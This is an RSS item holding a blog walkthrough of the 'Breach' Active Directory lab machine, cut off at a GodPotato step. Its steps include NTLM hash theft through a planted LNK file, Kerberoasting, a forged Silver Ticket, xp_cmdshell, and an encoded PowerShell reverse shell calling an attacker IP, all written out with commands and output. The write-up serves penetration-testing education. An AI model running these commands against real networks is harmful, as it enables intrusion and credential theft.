<?xml version="1.0" encoding="UTF-8"?><rss version="2.0" xmlns:content="http://purl.org/rss/1.0/modules/content/"><channel><title>4b0dx</title><description>Blog</description><link>https://dahmanisec.me/</link><language>en</language><item><title>Breach</title><link>https://dahmanisec.me/posts/breach/</link><guid isPermaLink="true">https://dahmanisec.me/posts/breach/</guid><pubDate>Mon, 15 Dec 2025 00:00:00 GMT</pubDate><content:encoded>&lt;h1&gt;Initial Access&lt;/h1&gt;
&lt;h2&gt;Nmap Scan&lt;/h2&gt;
&lt;p&gt;I began the assessment with a comprehensive Nmap scan to identify open ports and running services on the target domain controller:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;└─$ nmap -p- -sV -vv --min-rate=3000 -oN breach.txt 10.129.12.240

# Nmap 7.95 scan initiated Mon Dec 15 09:13:21 2025 as: /usr/lib/nmap/nmap --privileged -p- -sV -vv --min-rate=3000 -oN breach.txt 10.129.12.240
Nmap scan report for 10.129.12.240
Host is up, received echo-reply ttl 127 (0.18s latency).
Scanned at 2025-12-15 09:13:21 +01 for 151s
Not shown: 65517 filtered tcp ports (no-response)
PORT      STATE SERVICE       REASON          VERSION
53/tcp    open  domain        syn-ack ttl 127 Simple DNS Plus
80/tcp    open  http          syn-ack ttl 127 Microsoft IIS httpd 10.0
135/tcp   open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
139/tcp   open  netbios-ssn   syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp   open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: breach.vl0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds? syn-ack ttl 127
464/tcp   open  kpasswd5?     syn-ack ttl 127
593/tcp   open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped    syn-ack ttl 127
1433/tcp  open  ms-sql-s      syn-ack ttl 127 Microsoft SQL Server 2019 15.00.2000
3268/tcp  open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: breach.vl0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped    syn-ack ttl 127
3389/tcp  open  ms-wbt-server syn-ack ttl 127 Microsoft Terminal Services
5985/tcp  open  http          syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
9389/tcp  open  mc-nmf        syn-ack ttl 127 .NET Message Framing
49664/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49677/tcp open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
49917/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
Service Info: Host: BREACHDC; OS: Windows; CPE: cpe:/o:microsoft:windows

Read data files from: /usr/share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Dec 15 09:15:52 2025 -- 1 IP address (1 host up) scanned in 151.30 seconds
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The scan revealed a Windows Server 2022 domain controller (BREACHDC) with typical Active Directory services including DNS (53), LDAP (389), Kerberos (464), SMB (445), MSSQL (1433), WinRM (5985), and RDP (3389).&lt;/p&gt;
&lt;h2&gt;Updating Hosts File&lt;/h2&gt;
&lt;p&gt;To ensure proper name resolution for Kerberos authentication and other domain operations, I added the target to my local hosts file:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;└─$ echo -e &quot;10.129.12.240\tbreachdc.breach.vl\tbreach.vl\tbreachdc&quot; | sudo tee -a /etc/hosts
10.129.12.240	breachdc.breach.vl	breach.vl	breachdc
&lt;/code&gt;&lt;/pre&gt;
&lt;h2&gt;SMB Enumeration with Guest Access&lt;/h2&gt;
&lt;p&gt;I tested for guest authentication on the SMB service and confirmed that null authentication was enabled:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;└─$ nxc smb  breach.vl -u &quot;Guest&quot; -p &quot;&quot;
SMB         10.129.12.240   445    BREACHDC         [*] Windows Server 2022 Build 20348 x64 (name:BREACHDC) (domain:breach.vl) (signing:True) (SMBv1:False) (Null Auth:True)
SMB         10.129.12.240   445    BREACHDC         [+] breach.vl\Guest:
&lt;/code&gt;&lt;/pre&gt;
&lt;h2&gt;Share Enumeration&lt;/h2&gt;
&lt;p&gt;With guest access confirmed, I enumerated the available SMB shares to identify potential attack vectors:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;└─$ nxc smb  breach.vl -u &quot;Guest&quot; -p &quot;&quot; --shares
SMB         10.129.15.151   445    BREACHDC         [*] Windows Server 2022 Build 20348 x64 (name:BREACHDC) (domain:breach.vl) (signing:True) (SMBv1:False) (Null Auth:True)
SMB         10.129.15.151   445    BREACHDC         [+] breach.vl\Guest:
SMB         10.129.15.151   445    BREACHDC         [*] Enumerated shares
SMB         10.129.15.151   445    BREACHDC         Share           Permissions     Remark
SMB         10.129.15.151   445    BREACHDC         -----           -----------     ------
SMB         10.129.15.151   445    BREACHDC         ADMIN$                          Remote Admin
SMB         10.129.15.151   445    BREACHDC         C$                              Default share
SMB         10.129.15.151   445    BREACHDC         IPC$            READ            Remote IPC
SMB         10.129.15.151   445    BREACHDC         NETLOGON                        Logon server share
SMB         10.129.15.151   445    BREACHDC         share           READ,WRITE
SMB         10.129.15.151   445    BREACHDC         SYSVOL                          Logon server share
SMB         10.129.15.151   445    BREACHDC         Users           READ
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The enumeration revealed a critical misconfiguration: the &quot;share&quot; folder allows both READ and WRITE access to guest users. This is a significant finding as it opens up possibilities for credential theft attacks.&lt;/p&gt;
&lt;h2&gt;Exploring the Share&lt;/h2&gt;
&lt;p&gt;I connected to the writable share to explore its contents and identify potential targets:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;└─$ smbclient \\\\breach.vl\\share -U &quot;Guest&quot;
Password for [WORKGROUP\Guest]:
Try &quot;help&quot; to get a list of possible commands.
smb: \&amp;gt; ls
  .                                   D        0  Mon Dec 15 10:28:24 2025
  ..                                DHS        0  Tue Sep  9 11:35:32 2025
  finance                             D        0  Thu Feb 17 12:19:34 2022
  software                            D        0  Thu Feb 17 12:19:12 2022
  transfer                            D        0  Mon Sep  8 11:13:44 2025

		7863807 blocks of size 4096. 1505175 blocks available
smb: \&amp;gt; cd transfer
smb: \transfer\&amp;gt; ls
  .                                   D        0  Mon Sep  8 11:13:44 2025
  ..                                  D        0  Mon Dec 15 10:28:24 2025
  claire.pope                         D        0  Thu Feb 17 12:21:35 2022
  diana.pope                          D        0  Thu Feb 17 12:21:19 2022
  julia.wong                          D        0  Thu Apr 17 01:38:12 2025

		7863807 blocks of size 4096. 1505175 blocks available
smb: \transfer\&amp;gt; ls claire.pope
  claire.pope                         D        0  Thu Feb 17 12:21:35 2022

		7863807 blocks of size 4096. 1505175 blocks available
smb: \transfer\&amp;gt; cd claire.pope\
smb: \transfer\claire.pope\&amp;gt; ls
NT_STATUS_ACCESS_DENIED listing \transfer\claire.pope\*
smb: \transfer\claire.pope\&amp;gt; cd ..
smb: \transfer\&amp;gt; cd diana.pope\
smb: \transfer\diana.pope\&amp;gt; ls
NT_STATUS_ACCESS_DENIED listing \transfer\diana.pope\*
smb: \transfer\diana.pope\&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The share contained a transfer folder with user directories (claire.pope, diana.pope, julia.wong), though direct access to these folders was denied. The presence of user folders in a transfer share suggested this might be actively used by employees.&lt;/p&gt;
&lt;h2&gt;NTLM Hash Theft via Malicious LNK File&lt;/h2&gt;
&lt;p&gt;Since I had write access to the share, I employed a red teaming technique using a malicious shortcut (.lnk) file. When a user browses the folder containing the shortcut, Windows automatically attempts to resolve the shortcut&apos;s icon location, causing an outbound connection that leaks the user&apos;s NTLM hash.&lt;/p&gt;
&lt;p&gt;First, I started Responder to capture incoming NTLM authentication attempts:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;└─$ sudo responder -I tun0
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Then I used NetExec&apos;s slinky module to generate and upload a malicious LNK file that points to my Responder listener:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;└─$ nxc smb breach.vl -u &quot;Guest&quot; -p &quot;&quot; -M slinky -o NAME=test SERVER=10.10.14.77
SMB         10.129.12.240   445    BREACHDC         [*] Windows Server 2022 Build 20348 x64 (name:BREACHDC) (domain:breach.vl) (signing:True) (SMBv1:False) (Null Auth:True)
SMB         10.129.12.240   445    BREACHDC         [+] breach.vl\Guest:
SMB         10.129.12.240   445    BREACHDC         [*] Enumerated shares
SMB         10.129.12.240   445    BREACHDC         Share           Permissions     Remark
SMB         10.129.12.240   445    BREACHDC         -----           -----------     ------
SMB         10.129.12.240   445    BREACHDC         ADMIN$                          Remote Admin
SMB         10.129.12.240   445    BREACHDC         C$                              Default share
SMB         10.129.12.240   445    BREACHDC         IPC$            READ            Remote IPC
SMB         10.129.12.240   445    BREACHDC         NETLOGON                        Logon server share
SMB         10.129.12.240   445    BREACHDC         share           READ,WRITE
SMB         10.129.12.240   445    BREACHDC         SYSVOL                          Logon server share
SMB         10.129.12.240   445    BREACHDC         Users           READ
SLINKY      10.129.12.240   445    BREACHDC         [+] Found writable share: share
SLINKY      10.129.12.240   445    BREACHDC         [+] Created LNK file on the share share
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The module placed the shortcut on the root share folder. Since no credentials were captured there, I moved the LNK file to the transfer folder where user activity was more likely:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;└─$ smbclient \\\\breach.vl\\share -U &quot;Guest&quot;
Try &quot;help&quot; to get a list of possible commands.
smb: \&amp;gt; ls
  .                                   D        0  Mon Dec 15 09:42:13 2025
  ..                                DHS        0  Tue Sep  9 11:35:32 2025
  finance                             D        0  Mon Dec 15 09:29:07 2025
  software                            D        0  Thu Feb 17 12:19:12 2022
  test.lnk                            A      945  Mon Dec 15 09:42:13 2025
  transfer                            D        0  Mon Dec 15 09:28:41 2025

		7863807 blocks of size 4096. 1518803 blocks available
smb: \&amp;gt; cd transfer\
smb: \transfer\&amp;gt; ls
  .                                   D        0  Mon Dec 15 09:28:41 2025
  ..                                  D        0  Mon Dec 15 09:42:13 2025
  claire.pope                         D        0  Thu Feb 17 12:21:35 2022
  diana.pope                          D        0  Thu Feb 17 12:21:19 2022
  important.lnk                       A       23  Mon Dec 15 09:28:41 2025
  julia.wong                          D        0  Thu Apr 17 01:38:12 2025

		7863807 blocks of size 4096. 1518547 blocks available
smb: \transfer\&amp;gt; put test.lnk
putting file test.lnk as \transfer\test.lnk (0.8 kb/s) (average 0.8 kb/s)
smb: \transfer\&amp;gt; exit

&lt;/code&gt;&lt;/pre&gt;
&lt;h2&gt;Capturing NTLM Hash&lt;/h2&gt;
&lt;p&gt;Shortly after placing the malicious shortcut in the transfer folder, Responder captured the NTLMv2 hash of a user named Julia.Wong who browsed the share:&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;images/image.png&quot; alt=&quot;alt text&quot; /&gt;&lt;/p&gt;
&lt;h2&gt;Cracking the NTLMv2 Hash&lt;/h2&gt;
&lt;p&gt;I used John the Ripper with the default wordlist to crack the captured NTLMv2 hash:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;└─$ john hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 8 OpenMP threads
Proceeding with single, rules:Single
Press &apos;q&apos; or Ctrl-C to abort, almost any other key for status
Almost done: Processing the remaining buffered candidate passwords, if any.
Proceeding with wordlist:/usr/share/john/password.lst
Computer1        (Julia.Wong)
1g 0:00:00:00 DONE 2/3 (2025-12-15 09:47) 3.125g/s 131937p/s 131937c/s 131937C/s sierra1..faithfaith
Use the &quot;--show --format=netntlmv2&quot; options to display all of the cracked passwords reliably
Session completed.

&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The password was successfully cracked: &lt;code&gt;Julia.Wong:Computer1&lt;/code&gt;&lt;/p&gt;
&lt;h2&gt;Retrieving User Flag&lt;/h2&gt;
&lt;p&gt;With valid credentials for Julia.Wong, I connected to the share and retrieved the user flag from her transfer folder:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;└─$ smbclient \\\\breach.vl\\share -U &quot;Julia.Wong%Computer1&quot;
Try &quot;help&quot; to get a list of possible commands.
smb: \&amp;gt; cd transfer
smb: \transfer\&amp;gt; ls
  .                                   D        0  Mon Dec 15 09:43:47 2025
  ..                                  D        0  Mon Dec 15 09:53:15 2025
  claire.pope                         D        0  Thu Feb 17 12:21:35 2022
  diana.pope                          D        0  Thu Feb 17 12:21:19 2022
  important.lnk                       A       23  Mon Dec 15 09:28:41 2025
  julia.wong                          D        0  Thu Apr 17 01:38:12 2025
  test.lnk                            A      945  Mon Dec 15 09:43:47 2025

		7863807 blocks of size 4096. 1517491 blocks available
smb: \transfer\&amp;gt; cd julia.wong\
smb: \transfer\julia.wong\&amp;gt; ls
  .                                   D        0  Thu Apr 17 01:38:12 2025
  ..                                  D        0  Mon Dec 15 09:43:47 2025
  user.txt                            A       32  Thu Apr 17 01:38:22 2025

		7863807 blocks of size 4096. 1517491 blocks available
smb: \transfer\julia.wong\&amp;gt; cat user.txt
cat: command not found
smb: \transfer\julia.wong\&amp;gt; mget user.txt
Get file user.txt? yes
getting file \transfer\julia.wong\user.txt of size 32 as user.txt (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)
&lt;/code&gt;&lt;/pre&gt;
&lt;h1&gt;Privilege Escalation&lt;/h1&gt;
&lt;h2&gt;Domain User Enumeration&lt;/h2&gt;
&lt;p&gt;With Julia.Wong&apos;s credentials, I enumerated all domain users to identify potential targets for lateral movement:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;└─$ nxc smb  breach.vl -u &quot;Julia.Wong&quot; -p &quot;Computer1&quot; --users
SMB         10.129.15.151   445    BREACHDC         [*] Windows Server 2022 Build 20348 x64 (name:BREACHDC) (domain:breach.vl) (signing:True) (SMBv1:False) (Null Auth:True)
SMB         10.129.15.151   445    BREACHDC         [+] breach.vl\Julia.Wong:Computer1
SMB         10.129.15.151   445    BREACHDC         -Username-                    -Last PW Set-       -BadPW- -Description-
SMB         10.129.15.151   445    BREACHDC         Administrator                 2025-09-08 08:21:20 0       Built-in account for administering the computer/domain
SMB         10.129.15.151   445    BREACHDC         Guest                         2022-02-17 13:36:50 0       Built-in account for guest access to the computer/domain
SMB         10.129.15.151   445    BREACHDC         krbtgt                        2022-02-17 10:04:57 0       Key Distribution Center Service Account
SMB         10.129.15.151   445    BREACHDC         Claire.Pope                   2022-02-17 10:36:11 0
SMB         10.129.15.151   445    BREACHDC         Julia.Wong                    2022-02-17 12:58:50 0
SMB         10.129.15.151   445    BREACHDC         Hilary.Reed                   2022-02-17 10:36:11 0
SMB         10.129.15.151   445    BREACHDC         Diana.Pope                    2022-02-17 10:36:11 0
SMB         10.129.15.151   445    BREACHDC         Jasmine.Price                 2022-02-17 10:36:11 0
SMB         10.129.15.151   445    BREACHDC         George.Williams               2022-02-17 10:36:11 0
SMB         10.129.15.151   445    BREACHDC         Lawrence.Kaur                 2022-02-17 10:36:12 0
SMB         10.129.15.151   445    BREACHDC         Jasmine.Slater                2022-02-17 10:36:12 0
SMB         10.129.15.151   445    BREACHDC         Hugh.Watts                    2022-02-17 10:36:12 0
SMB         10.129.15.151   445    BREACHDC         Christine.Bruce               2022-02-17 10:36:12 0
SMB         10.129.15.151   445    BREACHDC         svc_mssql                     2022-02-17 10:43:08 0
SMB         10.129.15.151   445    BREACHDC         [*] Enumerated 14 local users: BREACH
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The enumeration revealed a service account named &lt;code&gt;svc_mssql&lt;/code&gt;, which is a high-value target as service accounts often have SPNs registered, making them vulnerable to Kerberoasting attacks.&lt;/p&gt;
&lt;h2&gt;Kerberos Ticket Request&lt;/h2&gt;
&lt;p&gt;I requested a TGT (Ticket Granting Ticket) for Julia.Wong to perform Kerberos-based attacks:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;└─$ impacket-getTGT breach.vl/Julia.Wong:Computer1 -dc-ip breachdc.breach.vl
Impacket v0.13.0.dev0+20250801.113918.849c74b7 - Copyright Fortra, LLC and its affiliated companies

[*] Saving ticket in Julia.Wong.ccache
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I set the Kerberos credential cache environment variable to use the obtained ticket:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;└─$ export KRB5CCNAME=Julia.Wong.ccache
&lt;/code&gt;&lt;/pre&gt;
&lt;h2&gt;Kerberoasting Attack&lt;/h2&gt;
&lt;p&gt;Using the TGT, I enumerated Service Principal Names (SPNs) in the domain to identify Kerberoastable accounts:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;└─$ impacket-GetUserSPNs breach.vl/julia.wong -k  -no-pass -dc-ip breachdc.breach.vl
Impacket v0.13.0.dev0+20250801.113918.849c74b7 - Copyright Fortra, LLC and its affiliated companies

[*] Getting machine hostname
ServicePrincipalName              Name       MemberOf  PasswordLastSet             LastLogon                   Delegation
--------------------------------  ---------  --------  --------------------------  --------------------------  ----------
MSSQLSvc/breachdc.breach.vl:1433  svc_mssql            2022-02-17 11:43:08.106169  2025-12-15 10:25:23.758809
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The svc_mssql account has an SPN registered for the MSSQL service. I requested a TGS ticket for this service, which is encrypted with the service account&apos;s password hash:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;
└─$ impacket-GetUserSPNs breach.vl/julia.wong -k  -no-pass -dc-ip breachdc.breach.vl -request
Impacket v0.13.0.dev0+20250801.113918.849c74b7 - Copyright Fortra, LLC and its affiliated companies

[*] Getting machine hostname
ServicePrincipalName              Name       MemberOf  PasswordLastSet             LastLogon                   Delegation
--------------------------------  ---------  --------  --------------------------  --------------------------  ----------
MSSQLSvc/breachdc.breach.vl:1433  svc_mssql            2022-02-17 11:43:08.106169  2025-12-15 10:25:23.758809

$krb5tgs$23$*svc_mssql$BREACH.VL$breach.vl/svc_mssql*$b04968a8c1b75ac84c7c258a8b2456fa$e8fefd68470b01cbd8d8c7a1c9f7f83b41d8a874931f534f85419473b4656885eea4bf5b19b5907011d730ff67273b13daea24745f8ea58ceca5a6638015d92188aaa8f4d4d3d7c0f837c8a14b9bc239c662ecc783a6169170185c6ab13d42e58661b8c9979a7a1ad6f019601497f9d6d755f15666a2efb27422fc75f403e81f18a532b3c23a0c390199ee72ba5d7cd1d1fb38ab59128f7a69e4ebc7dda7b60cd410822c9685f00cc7989e5add43d921124784114aa0757f6aa6932d76739789bcf4e8f5a0a381fb4ead790818f4f1a95580f687b18bb4cb467210054fc52f540b98a9e24b4ba0d2e9955f3b91dd52fbe7fb49a28d3e44a9b00862bf43acb07ee4309f68f3b1b6b8fe5593d1ef3b13603ce39732ca79a7cd76e36a4dafd6fee538a70d3317b5e7c6067b9cf7438075bf9096be16cb8fde1e6e3afbbc4bab651305e24cbc3a7e78ae2305da2f5165c0e56b9d3b4087041081c2b9e0bdcc516817125c01b94d2994dc74c7f752a2e6770530ca8818366075ae2b60108aa5bb7edd1633cc99d6e7744aaeb779eb5e4081a7bc69fcf7fdc68b7f6ea27a5e72a15c0f58495468cc37adf267984b45c36332d302600126f4d6d3b20945017bf1b7ece8d85dddaf1179b109e1a369ae6fe883d83cf4c884d18806b14354a91ae0da5c639e3b89476f5de0fda282b3e22fdfbb43d941cf888376862d823f8c0afda822b32fa383351600e38ddf73575f3dfbd1aed882762568caf314ed63c560719e6967ccb7c858d235cae5485099f3eeb271316b4fa4cdd36261ab34bcd21c1f4def3c6f183b64cf45144264602c82a5bdb04d7cfdc38c8d4e06b190fd08bbfdae1b0019e1a5487db40f2d3dce57373cc80a5afc8b4c1d9f12e5b1c275c66b470de5c65984b07e8f74449fbf4ea31c1d59f5b06663aed270c57958b434acd3974562e16fef2d063d898a8d20895db48892c3178aab7feac39652e79b1aaf1066007f47c0d9290b86990eaf9e6f141549c01621ad0e9a561aaca9e9f9a1c7eb158062ca54a48148dd5cda8980ac2132e143e28a69034f520bdcf55e4af172a64bd21f2247f15b125c5a833e61530e6fd800a8b9d3ae92030a014097db9c02944f8187535f8e3632fdb7f05b927bc1caa3381902a2fc7f8e9b780e2b2bc0591050c33401a38c94418067f382dd88db093e49fada7cefce181ea19d7d9ada0ad9b3c71995857c9582240492ddfc3ab8bb896a2623b9d9aeddff1eea400b756a7d137910a16952d52b64514a9c1cb7185b6ef95e510d2f584d27126d49ee6590196f7c3b916623f920dcde5864d25f1594ab4362a1ad89649b2fc8591ee502ed935c3aaa8eb2c2a8ac0fe00f4b79bd17cdb86bf642b584c298a3bb0e6deaa46abe0032401a48c5c191e49bd5a78cf2d30a2aedea2145f980d5cfd4c3ee35fc0f0ce63cd39796a546e9059dddf1227bad1ceba4976bf33362fb
&lt;/code&gt;&lt;/pre&gt;
&lt;h2&gt;Cracking the Kerberos TGS Hash&lt;/h2&gt;
&lt;p&gt;I cracked the captured TGS hash using John the Ripper:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;└─$ john svc_mssql.hash
Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 8 OpenMP threads
Proceeding with single, rules:Single
Press &apos;q&apos; or Ctrl-C to abort, almost any other key for status
Almost done: Processing the remaining buffered candidate passwords, if any.
Proceeding with wordlist:/usr/share/john/password.lst
Trustno1         (?)
1g 0:00:00:00 DONE 2/3 (2025-12-15 11:08) 25.00g/s 102400p/s 102400c/s 102400C/s ilovegod..Peter
Use the &quot;--show&quot; option to display all of the cracked passwords reliably
Session completed.
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The password was successfully cracked: &lt;code&gt;svc_mssql:Trustno1&lt;/code&gt;&lt;/p&gt;
&lt;h2&gt;Analyzing Service Account Privileges&lt;/h2&gt;
&lt;p&gt;Using BloodHound, I discovered that the svc_mssql account has SQLAdmin execution privileges over the domain controller, which can be leveraged to gain elevated access:&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;images/image-1.png&quot; alt=&quot;alt text&quot; /&gt;&lt;/p&gt;
&lt;h2&gt;Silver Ticket Attack&lt;/h2&gt;
&lt;p&gt;To exploit the MSSQL service, I crafted a Silver Ticket. First, I generated the NT hash of the svc_mssql password:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;└─$ python3 -c &apos;import hashlib,binascii; print(binascii.hexlify(hashlib.new(&quot;md4&quot;, &quot;Trustno1&quot;.encode(&quot;utf-16le&quot;)).digest()).decode())&apos;
69596c7aa1e8daee17f8e78870e25a5c
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Using the NT hash and domain SID, I forged a Silver Ticket for the Administrator account targeting the MSSQL service:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;└─$ impacket-ticketer -domain-sid &quot;S-1-5-21-2330692793-3312915120-706255856&quot; -spn &quot;MSSQLSvc/breachdc.breach.vl&quot; -nthash &quot;69596c7aa1e8daee17f8e78870e25a5c&quot; -domain breach.vl  -user-id 500   Administrator
Impacket v0.13.0.dev0+20250801.113918.849c74b7 - Copyright Fortra, LLC and its affiliated companies

[*] Creating basic skeleton ticket and PAC Infos
[*] Customizing ticket for breach.vl/administrator
[*] 	PAC_LOGON_INFO
[*] 	PAC_CLIENT_INFO_TYPE
[*] 	EncTicketPart
[*] 	EncTGSRepPart
[*] Signing/Encrypting final ticket
[*] 	PAC_SERVER_CHECKSUM
[*] 	PAC_PRIVSVR_CHECKSUM
[*] 	EncTicketPart
[*] 	EncTGSRepPart
[*] Saving ticket in Administrator.ccache
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I set the environment variable to use the forged Silver Ticket:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;└─$ export KRB5CCNAME=Administrator.ccache
&lt;/code&gt;&lt;/pre&gt;
&lt;h2&gt;MSSQL Access and Command Execution&lt;/h2&gt;
&lt;p&gt;Using the Silver Ticket, I connected to the MSSQL server as Administrator:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;└─$ impacket-mssqlclient -k -no-pass  -windows-auth breachdc.breach.vl
Impacket v0.13.0.dev0+20250801.113918.849c74b7 - Copyright Fortra, LLC and its affiliated companies

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(BREACHDC\SQLEXPRESS): Line 1: Changed database context to &apos;master&apos;.
[*] INFO(BREACHDC\SQLEXPRESS): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server 2019 RTM (15.0.2000)
[!] Press help for extra shell commands
SQL (BREACH\Administrator  dbo@master)&amp;gt; enable_xp_cmdshell
INFO(BREACHDC\SQLEXPRESS): Line 185: Configuration option &apos;show advanced options&apos; changed from 0 to 1. Run the RECONFIGURE statement to install.
INFO(BREACHDC\SQLEXPRESS): Line 185: Configuration option &apos;xp_cmdshell&apos; changed from 0 to 1. Run the RECONFIGURE statement to install.
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I enabled xp_cmdshell to execute operating system commands through the SQL Server.&lt;/p&gt;
&lt;h2&gt;Reverse Shell via MSSQL&lt;/h2&gt;
&lt;p&gt;I executed a PowerShell reverse shell payload through xp_cmdshell to gain an interactive shell on the target:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;SQL (BREACH\Administrator  dbo@master)&amp;gt; xp_cmdshell powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA0AC4AMQAxADMAIgAsADQANAA0ADMAKQA7ACQAcwB0AHIAZQBhAG0AIAA9ACAAJABjAGwAaQBlAG4AdAAuAEcAZQB0AFMAdAByAGUAYQBtACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAGIAeQB0AGUAcwAgAD0AIAAwAC4ALgA2ADUANQAzADUAfAAlAHsAMAB9ADsAdwBoAGkAbABlACgAKAAkAGkAIAA9ACAAJABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7ADsAJABkAGEAdABhACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AVAB5AHAAZQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AQQBTAEMASQBJAEUAbgBjAG8AZABpAG4AZwApAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAcwAsADAALAAgACQAaQApADsAJABzAGUAbgBkAGIAYQBjAGsAIAA9ACAAKABpAGUAeAAgACQAZABhAHQAYQAgADIAPgAmADEAIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwAgACkAOwAkAHMAZQBuAGQAYgBhAGMAawAyACAAPQAgACQAcwBlAG4AZABiAGEAYwBrACAAKwAgACIAUABTACAAIgAgACsAIAAoAHAAdwBkACkALgBQAGEAdABoACAAKwAgACIAPgAgACIAOwAkAHMAZQBuAGQAYgB5AHQAZQAgAD0AIAAoAFsAdABlAHgAdAAuAGUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkAKQAuAEcAZQB0AEIAeQB0AGUAcwAoACQAcwBlAG4AZABiAGEAYwBrADIAKQA7ACQAcwB0AHIAZQBhAG0ALgBXAHIAaQB0AGUAKAAkAHMAZQBuAGQAYgB5AHQAZQAsADAALAAkAHMAZQBuAGQAYgB5AHQAZQAuAEwAZQBuAGcAdABoACkAOwAkAHMAdAByAGUAYQBtAC4ARgBsAHUAcwBoACgAKQB9ADsAJABjAGwAaQBlAG4AdAAuAEMAbABvAHMAZQAoACkA
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I received the connection on my netcat listener:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;└─$ nc -lnvp 4443
listening on [any] 4443 ...
connect to [10.10.14.113] from (UNKNOWN) [10.129.15.151] 55060
pwd

Path
----
C:\Windows\system32
&lt;/code&gt;&lt;/pre&gt;
&lt;pre&gt;&lt;code&gt;PS C:\Windows\system32&amp;gt; whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeMachineAccountPrivilege     Add workstations to domain                Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeManageVolumePrivilege       Perform volume maintenance tasks          Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
&lt;/code&gt;&lt;/pre&gt;
&lt;h2&gt;Token Impersonation Attack&lt;/h2&gt;
&lt;p&gt;I enumerated the privileges of the current user and found SeImpersonatePrivilege enabled, which allows for token impersonation attacks to escalate to SYSTEM.&lt;/p&gt;
&lt;h2&gt;Exploiting SeImpersonatePrivilege with GodPotato&lt;/h2&gt;
&lt;p&gt;I uploaded GodPotato and ncat to the target system to perform a potato-style privilege escalation:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;
PS C:\Windows\system32&amp;gt; cd ../../Users
